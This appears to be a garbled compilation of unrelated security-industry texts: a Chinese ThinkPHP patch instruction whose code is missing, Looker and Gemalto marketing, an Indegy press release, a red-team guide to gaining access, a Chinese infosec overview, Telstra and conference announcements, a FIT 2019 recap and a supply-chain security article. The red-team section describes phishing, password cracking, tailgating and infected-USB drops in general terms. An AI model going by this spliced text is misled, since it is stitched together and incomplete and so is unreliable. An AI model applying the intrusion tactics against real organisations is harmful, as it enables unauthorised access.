直接添加补丁，在thinkphp5.0版本的 thinkphp/library/think/App.php 554行，thinkphp5.1版本的 thinkphp/library/think/route/dispatch/Url.php 63行添加如下代码：

Data security is vital for every company. Additionally, data privacy has become increasingly mission critical due to GDPR and other global privacy regulations. We see evidence of this everywhere -- from headlines in the press to changes in budgets and priorities. And according to CIO.com : “ Data analytics and security will dominate CIO spending in 2018 and 2019. ”

As the demand for data privacy and security has increased, so too has the demand for access to the data necessary for continued business innovation. It is the responsibility of organizations today to bridge the gap between data supply and demand in a way that keeps data secure and compliant with privacy laws.

The architecture of the Looker data platform simplifies database security by leveraging world-class database technologies, providing comprehensive data governance, and a robust audit trail.

Cloud databases such asGoogle BigQuery,Snowflake, andAmazon Redshift have made it easier and more economical to centralize an organization’s data. When data lives in many locations, it reduces an organization’s control over that data. This is why having a centralized database helps to increase security and meet modern compliance standards.

From here, whether it’s through a Looker-hosted or on-premise deployment, Looker’s architecture enables our data platform to query the centralized database directly, without moving or extracting data to workbooks, cubes, .csv files, third-party analytical databases, or desktops. This reduces the risk associated with unauthorized data access and exposure. An additional benefit of this ‘in-database’ design is that real-time data generates the freshest reports and insights.

Your company has likely made investments in modern user authentication tools. Looker supports two-factor authentication, integrates withLDAP, SSO, and can inherit the database permissions you’ve already established.

Built into Looker’s platform are fine-grained access controls that provide layered levels of data governance:

Historically, business users worked with or viewed reports with extracted data outside of the secure database environment. This data does not have native access controls, and creates data security and privacy concerns. Looker runs queries against the database itself and the results are displayed in a web browser. When sharing a report with another employee, the second user will only see the information they have permissions to access. If the report is shared with a person outside the organization, your security authorization protocols would only grant access to the Looker platform if it is set up as publically available data. This is an example of layers of data governance providing access, but protecting your data and customer privacy.

A layered approach to data governance is of particular value to industries which have specialized requirements about privacy:Healthcare and HIPAA, financial institutions and GLBA, credit cardholder data and PCI. More broadly, this includes any company who collects, processes, transfers or stores EU resident data requires GDPR compliance.

In the event of needing to investigate who has accessed what data, Looker provides a robust audit trail. Administrators can provide transparency to internal and external stakeholders and reveal who has accessed what data and when. The ‘in-database’ architecture means every query and viewed report creates a database event, which Looker logs. Looker has monitoring tools built into the platform. This unique ‘in-database’ architecture can also enable real-time alerting if a predefined event of interest takes place.

Additional considerations: Stricter Service Level and GDPR Data Protection Agreements between organizations are promising as fast as 24-hour alerts about data compromises. This is because GDPR requires that data breaches are reported within 72 hours to a regulator.

If your organization’s data is floating around on multiple third-party analytics servers, downloaded to thousands of workbooks or .csv files on desktops, can your organization meet its SLA and legal obligations? With Looker, your data remains centralized, and you can instantly search a log of all those who have historically accessed that data to more quickly understand the scope and focus on areas of interest.

Demands for access to the growing volumes of data to drive business success aren’t slowing down, neither are new data privacy regulations.

Looker’s integrations with modern authentication tools, along with layers of data governance, scale at the rate of data user growth. A robust audit trail is an insurance policy if data access questions arise. On top of that, Looker is SOC 2 Type 2 certified , demonstrating our commitment to security.

With Looker, it is in fact possible to bridge the gap between data supply and demand in a way that keeps that data secure and privacy compliant.

Acknowledging these challenges, perhaps the best way that organizations can keep their information safe is for them to adopt a data-centric approach. This type of strategy involves companies using encryption that’s capable of providing persistent protection of sensitive data at all critical points in its lifecycle. Such protection is incomplete if organizations can’t use key management to create, distribute, store, rotate and revoke/destroy cryptographic keys as needed.

Digital security company Gemalto understands these benefits of encryption and key management. It also realizes that companies don’t always have the necessary budget or know how to buy, deploy and maintain hardware in pursuit of these security controls, and sometimes, even when they do, they choose not to because it’s not their core competency. Hence its decision to create SafeNet Data Protection On Demand , a cloud-based platform through which companies can click and deploy cloud-based HSM, key management and encryption services without the need for additional hardware, or expertise.

Gemalto has maintained from the beginning that SafeNet Data Protection On Demand can save customers time and money with its many features, which include the ability to set up a certified cloud-based HSM service and to digitally sign software and firmware packages or electronic documents. To prove this point, the security company decided to subject its solution to a rigorous review by IAIT Test Laboratory. Dr. Gtz Güttich, a well-respected senior IT consultant and editor, led a team of German IT specialists in their analysis of SafeNet Data Protection On Demand.

For the review, Gemalto made available to the researchers a test account through which they could explore the solution’s functionality. Dr. Güttich and his colleagues used that account, in turn, to create several test users and activate various services to secure their test data. In particular, they directed their efforts towards evaluating the management and configuration of the solution’s six key services: “HSM On Demand for Digital Signing,” “HSM On Demand for Hyperledger,” “Key Vault/HSM On Demand,” “HSM On Demand for Oracle TDE Database,” “Key Broker On Demand for Salesforce” and “HSM On Demand for PKI Private Key Protection.”

In the course of their analysis, Dr. Güttich and his team did come across an issue in configuring the Certificate Authority under the “PKI Private Key Protection” service. The issue specifically involved selecting a Cryptographic Service Provider (CSP) from Gemalto from a corresponding dropdown menu. Gemalto worked with the researchers to provide support so that Dr. Güttich and his colleagues could proceed with their investigation. The security firm also revised its configuration tools in the meantime to permanently resolve the issue.

But that one bug didn’t detract from the research team’s overall impressions of SafeNet Data Protection on Demand. As it explained in its summary report :

With SafeNet Data Protection on Demand, Gemalto offers an exceedingly interesting service which has the potential to also make code signing, encryption and key management available to companies for which the necessary efforts and the associated costs had previously been too much. Users of this service do not need to purchase and administrate any special hardware, and all clients pay only for the services they actually use. SafeNet Data Protection on Demand can also be a big help toward achieving GDPR conformity (in the context of the “right to be forgotten”) because stored data and keys can simply be erased whenever desired.

The researchers went on to say that the solution was “comparatively quick to set up and relatively simple to use,” with Gemalto’s technical support “convincingly good.” This finding explains what Gemalto has known all along: SafeNet Data Protection on Demand provides companies with an easy-to-use and affordable option for fulfilling their encryption and key management needs.

Want more insight from Dr. Güttich and his team? You can read their findings in full in English and German .

NEW YORK (BUSINESS WIRE) lt;a href=”https://twitter.com/hashtag/ICS?src=hash” target=”_blank”gt;#ICSlt;/agt; Indegy , a leader in industrial

451

as giving customers a more holistic view into the operational status and

security posture of their ICS (industrial control system) networks. A

complete copy of the report is available here .

“The ability to provide visibility into network operations is table

stakes for any ICS security program. ICS security vendors will need to

continue seeking differentiation by enriching that visibility down to

the device level and offering higher order functions such as threat

intelligence, incident response and vulnerability management in order to

remain competitive,” said Patrick Daly, Analyst with 451 Research.

According to the report, Indegy’s primary differentiator comes from the

fact that it has offered active detection capabilities through Device

Integrity queries since 2016, whereas many of its competitors initially

(and some still do) prioritized passive detection. With the expansion of

its platform’s support beyond operational assets to IT; Indegy can

discover and provide visibility into the activities of all of a

customer’s windows machines, network switches, servers and other

components that are critical aspects of most ICS environments. Combined

with policy and anomaly based threat hunting, this gives customers a

more holistic view and response mechanism based on the operational

status and security posture of their ICS networks.

“Unlike competing solutions, Indegy has focused since day one on

providing the deepest and most complete visibility, security and control

for proprietary devices that control industrial processes in critical

infrastructures, manufacturing, energy and water treatment, ” said Barak

Perelman, CEO of Indegy. “Our ability to actively and passively monitor

both operational and information technology assets provides customers a

360 degree view of threats regardless of whether they originate from an

external attack, malicious insider or are the result of human error.”

About Indegy

Indegy, a leader in industrial cyber security,

protects industrial control system (ICS) networks from cyber threats,

teams with full visibility, security and control of ICS activity and

threats by combining hybrid, policy-based monitoring and network anomaly

detection with unique device integrity checks. Indegy solutions are

installed in manufacturing, pharmaceutical, energy, water and other

industrial organizations around the world.

For more information visit www.indegy.com

and follow us on Twitter and LinkedIn .

Contacts

Marc Gendron

Marc Gendron PR for Indegy

781-237-0341

This phase is the first of several where the red team actively interacts with the target’s environment. Some of these phases tend to blend together, as the line between gaining initial access and establishing a foothold on the target network can be a fine one. In the gaining access phase, the red team takes steps to bypass the organization’s defenses and finds a way to establish some access to internal systems. In the next phase, the team works on improving this level of access to meet the objectives of the red team operation.

The goal of this phase of the assessment is to gain access to the target environment and an initial foothold on the target network. This can be accomplished in a variety of ways, and, in the previous phase, the red team prepares a few rough plans on how to do so. In this phase, the red team selects a plan of action and executes it. If successful, the phase is completed. Otherwise, they continue the cycle of collecting information about the target system, selecting a plan of attack, and executing the plan until successful or the assessment has been rendered impossible to complete due to the detection of the attack by security personnel.

The end goal of this phase is to create a foothold on the target network. To accomplish this, the red team needs to select a plan of attack and execute it, defeating digital and/or physical defenses on their way.

If the red team has done their job properly in previous phases, they have one or more plans for breaching the target network. If they have multiple plans or flexible plans, some options may be better and less likely to be detected than others. Ideally, one plan will have a high probability of success and a low probability of detection, giving the team a solid place to start from.

Depending on the specifics of the attack plan, there may be conditions that would make the plan more or less likely to succeed. At this point in the assessment, the team should identify these conditions and determine when and how best to launch the plan. For example, a network-based attack may be more likely to succeed outside of business hours when the security team is more likely to be understaffed and the potential of sneaking past increases. Attacking physical defenses may be easier at night when lockpicking is less detectable (since it’s dark) or during shift change or smoke breaks when the increased flow of people through the organization’s defenses gives the red team member a crowd to hide in. Identifying these potential advantages and adapting the attack plan to make use of them can be crucial to the success of a red team assessment.

The goal of the target’s security team is keeping attackers like the red team out. The main goal of this phase of the assessment is bypassing or defeating the defenses put in place to protect the target network from unauthorized access. In the course of an assessment, the red team may need to defeat both digital and physical defenses.

The goal of digital defenses is to allow all of the right people and traffic in and keep all of the wrong people and traffic out. In trying to defeat these defenses, a red team has two main options: find a hole in the defenses or bypass them by becoming one of the “right people.”

Security programs and defenses on the target network are software, and software has bugs. Identifying and developing exploits for these vulnerabilities is what most people picture when they think of hacking. Security software vulnerabilities can be roughly broken into design and configuration flaws and implementation errors.

Design and configuration flaws are any case that the developer or user of the software didn’t anticipate when it was built or set up to protect the network. Hardcoded default passwords are a design flaw that pentesters can exploit. Allowing anonymous FTP connections are an example of a configuration error. Pentesters can identify and exploit these mistakes to gain access to systems.

Implementation errors are programming flaws in security software or any exposed services. These flaws are publicly announced once patches are available, but not all organizations apply patches promptly. The service detection and banner grabbing phase of target identification is invaluable for this since it allows identification of potentially vulnerable software without being as detectable as a full vulnerability scan. By cross-checking versions against a list of CVEs, the red team may find an unpatched vulnerability that would allow access to the system.

The other main option for defeating digital defenses is bypassing them by becoming one of the “right people” in the eyes of the security software. Since most organizations use passwords as their means of authentication to systems, this typically means stealing a user’s password. This is a commonly-used tactic for hackers, with stolen credentials being used in 40% of incidents. Password theft can be accomplished in a variety of ways.

If the red team has the ability to sniff network traffic (usually by connecting to company Wi-Fi), then password cracking is a good option. Many protocols send hashed passwords over the network and some even send unhashed ones. If a red team can gain access to password hashes, then cracking them with a tool like John the Ripper is a good option.

Gaining access is another use case where social engineering shines. Phishing emails that pretend to be from a trusted brand are a great way to get credentials. A recent poll has found that 75% of the respondents reuse passwords across personal and business accounts, meaning that phished credentials are likely to help in an attack. Phone-based phishing attacks, such as those pretending to be from the IT help desk, are another great way to get passwords. Social engineering can also be carried out physically (e.g., dropping infected USB drives in the company parking lot). If social engineering is within the scope of the assessment and can make the initial stage of gaining access easier, it should be used.

Pen-Testing Training

Many aspiring red team testers focus too much on the digital side of hacking and not enough on the physical. The main advantages of digital hacking are that it can be performed from anywhere and it’s more anonymous. However, physical attacks can achieve the same goals with much less effort by the red team if performed correctly.

Physical defenses can be either defeated or bypassed as well. Examples of defeating physical defenses include climbing over fences, picking locks or climbing through vents like your favorite action hero.

Bypassing physical defenses typically involves social engineering. Say you want to get through a locked door into the building. You could try to pick the lock, but odds are that you’ll be quickly caught and arrested. However, if you walk up to the door carrying a heavy box right after someone else, odds are they’ll hold it for you without a second thought.

By using a pretext that doesn’t set off someone’s mental defenses, a red team member can achieve their objective and slip through defenses much more easily. And physical access to the target often presents opportunities for a much more comprehensive and less detectable compromise of the target network.

信息安全是一个关系国家安全和主权、社会稳定、民族文化继承和发扬的重要问题。其重要性，正随着全球信息化步伐的加快越来越重要。信息网络涉及到国家的政府、军事、文教等诸多领域，存储、传输和处理的许多信息是政府宏观调控决策、商业经济信息、银行资金转账、股票证券、能源资源数据、科研数据等重要的信息，其中有很多是敏感信息，甚至是国家机密。 虽然计算机网络给人们带来了巨大的便利，但互联网是一个面向大众的开放系统，对信息的保密和系统的安全考虑得并不完备，存在着安全隐患，网络的安全形势日趋严峻。随着信息犯罪的逐年增加，有效的确保信息安全成为了全民关注的焦点。

信息安全的概念相对比较宽泛，通过阅读大量的中外文献资料，信息安全的概念可以归纳如下：

信息安全是指保障国家、机构、个人的信息空间、信息载体和信息资源不受来自内外各种形式的危险、威胁、侵害和误导的外在状态和方式及内在主体感受。信息技术的发展也促使信息安全的内涵不断延伸，可以理解为信息系统抵御意外事件或恶意行为的能力，这些事件和行为将会危及存储、处理或传输的数据或由这些系统所提供服务的机密性、完整性、可用性、不可否认性、真实性和可控性，这6个属性是信息安全的基本属性。

有威胁才会有安全问题，信息安全防护是针对威胁制定的对策。信息安全威胁的产生是社会发展到一定阶段的产物，其产生的根本原因是不法分子的私欲，当然还有其他直接、间接的原因。

信息安全的威胁总结起来主要有以下几种：

(1) 来源威胁

现在几乎所有的CPU、操作系统、外设、网络系统甚至一些加密解密工具都来源于国外，这就相当于自己的秘密掌握在别人手里一样，不可能不受制于人。

(2) 传输渠道威胁

信息要经过有线或无线的通道来进行传输。信息在传输的过程中可能被窃听、篡改、伪造。信息的安全受到威胁，合法用户的权益也受到侵害。信息的传输还要经过有形和无形的介质，由于外界环境的因素会使信号减弱、失真、丢失，因此传输的信号被严重破坏。

(3) 设备故障威胁

设备的故障会导致通信中断。在整个信息系统中，硬件设备非常多，因而故障率也非常高。

(4) 系统人员威胁

主要体现在2个方面：(1)软件开发者在开发的软件中还有残留错误，往往这些埋藏很深的错误会导致不可挽回的损失;(2)网络管理员和运维人员的文化素质和人品素质影响着网络安全。网络管理员是最直接接触网络机密的人，他们有机会窃取用户的密码以及其他秘密资料，并且他们的行为可能会破坏网络的完整性，是对信息安全最直接的威胁。

(5) 所处环境威胁

信息安全立法滞后的特点为黑客们的违法犯罪行为提供了可乘之机，而且由于存在各自的国家利益，各国在联合打击国际黑客犯罪方面的合作力度不够。信息安全技术本身的发展过程中还有很多不成熟的地方，这些地方经常被不法分子所利用。

(6) 病毒威胁

计算机病毒成为严重危害。近来，通过网络传播的计算机病毒越来越多，产生的危害性也越来越大。防毒软件具有一定的滞后性，不能产生防患于未然的效果。

从技术层面主要可以化分为四类：物理安全、运行安全、数据安全和内容安全。不同的方面在客观上反映了技术系统的不同安全属性，也决定了信息安全技术不同的表现形式。

(1) 物理安全

物理安全是围绕网络与信息系统的物理装备及其有关信息的安全。主要涉及信息及信息系统的电磁辐射、抗恶劣工作环境等方面的问题。面对的威胁主要有自然灾害、电磁泄露、通信干扰等。主要的保护方式有数据和系统备份、电磁屏蔽、抗干扰、容错等。

(2) 运行安全

运行安全是围绕网络与信息系统的运行过程和运行状态的安全。主要涉及信息系统的正常运行与有效的访问控制等方面的问题。面对的威胁包括网络攻击、网络病毒、网络阻塞、系统安全漏洞利用等。主要的保护方式有访问控制、病毒防治、应急响应、风险分析、漏洞扫描、入侵检测、系统加固、安全审计等。

(3) 数据安全

数据安全是围绕数据(信息)的生成、处理、传输、存储等环节中的安全。主要涉及数据(信息)的泄密、破坏、伪造、否认等方面的问题。面对的威胁主要包括对数据(信息)的窃取、篡改、冒充、抵赖、破译、越权访问等。主要的保护方式有加密、认证、访问控制、鉴别、签名等。

(4) 内容安全

内容安全是围绕非授权信息在网络上进行传播的安全。主要涉及对传播信息的有效控制。面对的威胁主要包括通过网络迅速传播有害信息、制造恶意舆论等。主要的保护方式有信息内容的监测、过滤等。

可以通过管理手段和技术手段两个方面来保障信息安全。

(1) 美国信息安全产品标准分为9类：

(2) 按照中国公安部标准分类分为7类：

(3) 按照中国基本分类标准分为6类：

按照安全厂商产品分类可以分为：物理安全、网络安全、主机安全、应用安全、安全管理、移动与虚拟化安全、工控安全。

Telstra has unveiled a major revamp of its support for Australian small businesses, including a new mobile and tablet plan with no lock-in contract and no excess data charges in Australia.

Australia’s largest telco announced on Wednesday it has also launched a new 24/7 tech support service and thousands more dedicated small business specialists across the country.

Telstra positions these latest announcements as the next stage in the rollout of its T22 strategy, which it says has already delivered simpler products by removing domestic excess data charges on consumer mobile plans and provided more choice for customers creating a home or mobile package.

The revamp was announced at an Illawarra Business Chamber Forum in Wollongong on Wednesday by Telstra CEO Andrew Penn who said the T22 milestone for small business was “perfectly timed as many more businesses look to technology to drive productivity, access new markets and improve customer experience”.

“Our new approach for small business is built around three things flexibility to enable businesses to scale and choose what is right for them, greater cost certainty and value, and expert service and advice all critical elements for success in today’s fast-paced business environment.

“We know every small business is different our job is to make sure we have leading solutions and services that are fit for purpose and what we’ve announced today does that,” Penn said.

Telstra’s new suite of solutions and services for small business includes:

Penn said the new solutions were about ensuring Telstra was not only providing advanced technology solutions to small businesses, but also the essential support to go with it.

“This is a significant increase to the level of dedicated service and support we provide small businesses, to help take away complexity and give them peace of mind with their technology usage and support,” Penn said.

Telstra confirmed the next key milestone under its T22 strategy would be the introduction of a new “market leading” loyalty program in March 2019.

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!

近半年的时间精心筹备，只为了不辜负大家的期待。如果说去年我们做的还不够好，那今年FIT 2019从开场、议题质量、Hack Demo展示等环节，到场外趣味设施、厂商展台安排，一定能够给各位一个满意的答复。

对于网络安全行业来说，一年一度的FIT 大会是一次年终的回顾和展望，与业内大咖共同探讨未来的网络安全发展方向以及应对措施；对于无数的白帽子、极客来说，FIT 2019也是今年备受关注的年终大趴，为此CodeSec 精心准备了大量的精华议题，还有众多娱乐项目，为所有前来支持的朋友和厂商提供一个愉快的交流、学习平台。

2018年12月12日，FIT 2019首日议程顺利结束，会场内外迸发出许许多多的精彩片段，让我们充分感受到网络安全爱好者这个群体的魅力，进一步拉近了用户与CodeSec的距离。接下来就跟着小编的视角来回顾一下FIT 2019 首日的盛况吧。

开场的说唱大家还喜欢吗？事实证明，安全圈的元素还是能够与流行元素进行完美融合，摩擦出不一样的火花。

作为FIT 2019的主办方，斗象科技创始人及CEO 谢忱（THANKS）为本次发表了开场演讲，主题为《智能引领安全服务升级》。面对如此盛大的场面，谢忱难免有所感触。CodeSec从2010年诞生开始，成为国内首个开放的网络安全社区，发展到现在的规模，离不开所有CodeSec的支持者。

此外，谢忱阐述了这几年来网络安全形势的变化，并且表示未来安全服务市场规模将会持续增长，这一点与Gartner的行业报告的结论是比较符合的。谢忱表示，创新思维、模式与技术以及商业化这三个要素将成为推动产业前行的主要动力。

本次 FIT 2019 大会也得到了中共上海市委网络安全和信息化领导小组办公室、国家信息技术安全研究中心、国家互联网应急中心、中国信息安全测评中心等国家部门的大力支持和指导。

作为每年FIT 大会的重磅环节，全球高峰会主要关注安全行业发展的宏观策略与思路，本次邀请了多位国内外知名企业高管参与内容分享。

Cisco全球产品管理高级总监Kevin Skahill 率先带来了《数字化时代基于意图的自动化安全网络架构》主题演讲。全新的挑战和机遇带来了新的业务需求。作为全球最大的互联网业务供应商之一，思科面对新的互联网局势，提出了新的思路。 Skahill在大会上提到了零信任架构的理念，思科相信，这将会成为未来网络安全架构的流行框架之一。 零信任已经成为2018年度最热门的行业关键词之一，基于意图的网络可加速可信访问流程，得以更好的将互联网商业与安全理念相结合。

万物互联已经成为互联网发展的主流趋势之一，而其中所衍生的安全问题已经受到广泛地重视。Digicert全球产品与标准副总裁Dean J. Coclin演讲主题为《探究物联网系统中的安全威胁》。入乡随俗，Coclin还给自己取了一个非常地道的中文名字“丁考林”。正如Coclin所言，物联网对人们的生活做出了太多的改变，极大提升了生活的便利性。但同时，攻击汽车、入侵医疗设备、黑掉玩具，脱离了传统互联网等安全事故的发生，物联网的发展也遭遇了最大的门槛，那就是安全问题。Coclin认为，避免直接的互联网连接、更改默认的登陆凭证、更新固件、检查默认设置是能够有效缓解物联网安全风险的基本要素。

All in AI 的百度在人工智能领域已经取得了诸多成就，百度安全事业部副总经理沈鹏飞以《有AI，更安全》的主题阐述了百度在人工智能方面的理解。沈鹏飞从PC，到移动，再到AI，百度将由思考变为实践，为整个AI行业赋能。 从人脑到电脑，从网络到AI。如何提升设备的安全性，是AI时代的关键问题。

作为本环节最后一个分享的议题，上台的嘉宾吸引了全场关注的焦点。来自新加坡，一口不太标准的中文自我介绍，全程英文演讲确时不时冒出一两个中文词，让人一脸懵逼的同时也让听众觉得更加有趣。他就是 Fortinet亚太区首席顾问 Anthony Lim。

Anthony Lim分享了关于Fortinet Security Fabric安全体系架构的实践经验。他表示，数字化转型带来的改变太过迅速，让人目不暇接。Fortinet Security Fabric安全体系架构具备无缝、协同、智能三大特征，能够实现安全可视化、多个安全技术实现互动，同时自动响应安全事件并持续性的进行安全评估。

Hack Demo是每年FIT大会最受欢迎的环节，能够在现场见证黑客的破解过程。

马赛克一直被视为阻碍人类进步的阶梯，却在极棒名人堂选手杜昂昂的手下形同虚设。利用GAN模型，能够在几秒钟之内就能去掉一张比基尼图片中的马赛克实现近乎完美的还原。

当被问及这样做的目的，杜昂昂只留下一句话：“我想让机器也拥有想象力”。

而更精彩的当属第二个Hack Demo展示，来自360天马安全团队的杨芸菲为讨“女友”欢心，利用黑客技术远程控制了全场的荧光棒，变成女神最喜欢的颜色。最终收到一张好人卡，各位围观的黑客们你们能给这位“受伤”的黑客支个招挽回女神的芳心么？

在这个真正属于极客的分享会，这里将让你看到了不起的安全研究者和那些“黑科技”技术成果，能够现场领略顶级漏洞猎人的魅力。

全球顶尖漏洞猎人、PeritusInfoSec创始人 Pranav Hivarekar

在此前的议题前瞻中，印度小哥Pranav Hivarekar 引起了很多人的关注。他既是全球顶尖漏洞猎人，也是PeritusInfoSec创始人。三行代码发现价值一万五千美金的漏洞，让多少漏洞挖掘高手也钦佩不已。印度的小哥详细的介绍了他作为漏洞猎人的经历以及相关挖掘技巧。 轻描淡写但言语之间还是透出一股自豪，不禁感慨漏洞猎人赚钱真容易，挖洞真帅气，听的我都想去学技术了。

另一位业内大牛想必多数人也已经非常熟悉了，他是知道创宇CSO兼404实验室总监周景平，人称黑哥。听黑哥讲安全，从不一样的角度了解网络空间漏洞挖掘，学习新姿势。

黑哥认为，网络空间的漏洞挖掘更多的在于寻找“蓝海”，找到并能识别“蓝海”是关键；与之相对的这是安全“红海”，是安全对抗激烈的领域深耕细作。（en……这段话容我回去好好消化一下）

又一位重磅嘉宾登场，Palo Alto Networks 亚太区系统工程业务高级总监Orcun Tezel带来《利用云端沙箱和机器学习方式迅速捕获安全攻击》主题分享。网络威胁日益严重，攻击手段不断翻新，网络世界时刻处于危险之中。Tezel 分享了如何抵御和定位网络攻击的三个思路：

四度登台FIT，著名漏洞猎人同时也是斗象科技的联合创始人兼CTO 张天琪为我们带来《从Bugbounty看现代应用安全攻防》。一年以来，战果累累，伦敦、拉斯维加斯、悉尼，足迹遍布世界各地，在各类安全大会都留下了中国hacker的痕迹。 通过简单的几个例子，就让现场的观众感受到了Bugbounty的有趣之处以及顶级漏洞猎人的强大。

作为安全圈备受关注的颁奖盛典，WitAwards 2018互联网安全年度评选也和FIT 2019同期举行，旨在发掘优秀行业案例，树立年度标杆，为数万名从业者和数百款安全产品的努力与创新喝彩。今年又会有哪些企业、团队或者个人能够手捧大奖而归呢？本届WIT Awards 2018总共将产生8项大奖，首日就有六项大奖成功揭晓：

年度国家力量――360

年度安全团队――无糖信息阿斯巴甜攻防实验室

年度品牌影响力――知道创宇 云安全防御平台

年度技术变革――百度安全 OpenRASP

年度创新产品――腾讯云 数盾、云镜和威胁猎人 TH-Karma业务情报监测平台

年度热门产品及服务――瀚思科技 大数据安全平台、瑞星 企业终端安全管理系统软件

FIT 2019大会首日，除了主会场的精彩内容之外，不少观众也沉迷场外游戏区无法自拔，还更多精心打扮的小姐姐能撩，要不是我要写稿，我也去“沉迷”。

Experts sound off on how companies can work with their third-party suppliers and partners to secure the end-to-end supply chain.

NYC ― FromDelta Airlines toBest Buy, a number of big-name companies were involved this year in data breaches but even though their names made headlines, the actual security incidents occurred due to flaws in third-party partners.

Across the board, companies are scratching their heads trying to determine the best methods to manage their supply chain including hardware, software and beyond in order to maintain end-to-end security. But it’s not an easy task.

Ultimately, “There needs to be a shift in conversation,” Emily Heath, chief information security officer at United Airlines, said at the WSJ Cyber Executive Forum on Tuesday. “We’re responsible for patching our own computers but we also work with hardware and software suppliers… and we’re the ones in the headlines even when the vulnerabilities come from the third parties. I spend a ton of time worrying about their products.”

Supply chain attacks are particularly insidious for several reasons. First, they provide a lucrative opportunity for hackers to exploit a vulnerability and hit several companies at once and rack up more customers’ data. Second, with the widening net of the tech ecosystem and more partnerships being formed, it’s difficult to pinpoint and prevent them.

In fact, a recent survey by CrowdStrike found that two-thirds of firms surveyed experienced a software supply-chain attack in the past 12 months.

Even if companies have strategies in place for securing the supply chain, they might not work.

CrowdStrike’s survey revealed that 87 percent of those that suffered a software supply-chain attack had either a full strategy in place, or some level of response pre-planned at the time of their attack ― which proved ineffective.

Worse, on average, respondents from nearly all of the countries surveyed took close to 63 hours to detect and remediate an attack.

How can companies start to secure their supply chain and coordinate with their third-party parents?The first step, said Heath, is understanding those parties who they are and what they bring to the partnership.“Step one is understanding…what they do for you, who goes to accounts payable, and so on,” she said.

Securing the Supply Chain

Edna Conway,chief security officer of Global Value Chain at Cisco, has found success in taking a “layered approach” to securing the supply chain.

Conway has built an architecture incubated inside the supply chain and manufacturing that she says covers 11 domains including identity management, access control and behavioral security.

“We need to take a comprehensive view of who is providing what. We need to understand and map that, and write requirements for third parties that aren’t prescriptive but goal-based,” she said. “What processes and tools are a shared concern? We need to understand the businesses of our third parties so we can blend that.”

Another aspect of securing supply chains is dealing with the scale, as some companies might have thousands of technology partners.

For Rob Joyce, senior advisor of cybersecurity strategy for the National Security Agency (NSA), supply chain is hierarchical.

“When you think of securing the supply chain, you need to work down the pyramid for who you choose to secure your business,” he said. “People need to think about supply-chain partners with a high threat model.”

Heath agreed.United Airlines and others are facing an increasingly complex ecosystem. United needs to juggle tens of thousands of partners and suppliers that the airline does business with third parties who might be connected to their network, have access to the network, or does some sort of business with them.

“You need tiering you need levels, because you can’t secure them all,” she said.

The good news, said Conway, is that high-profile breaches like Ticketmaster and Kmart have “woken up” the world.

“We’re seeing more architectures being developed that allow us to act on threats that can cause manipulation or disruption,” said Conway.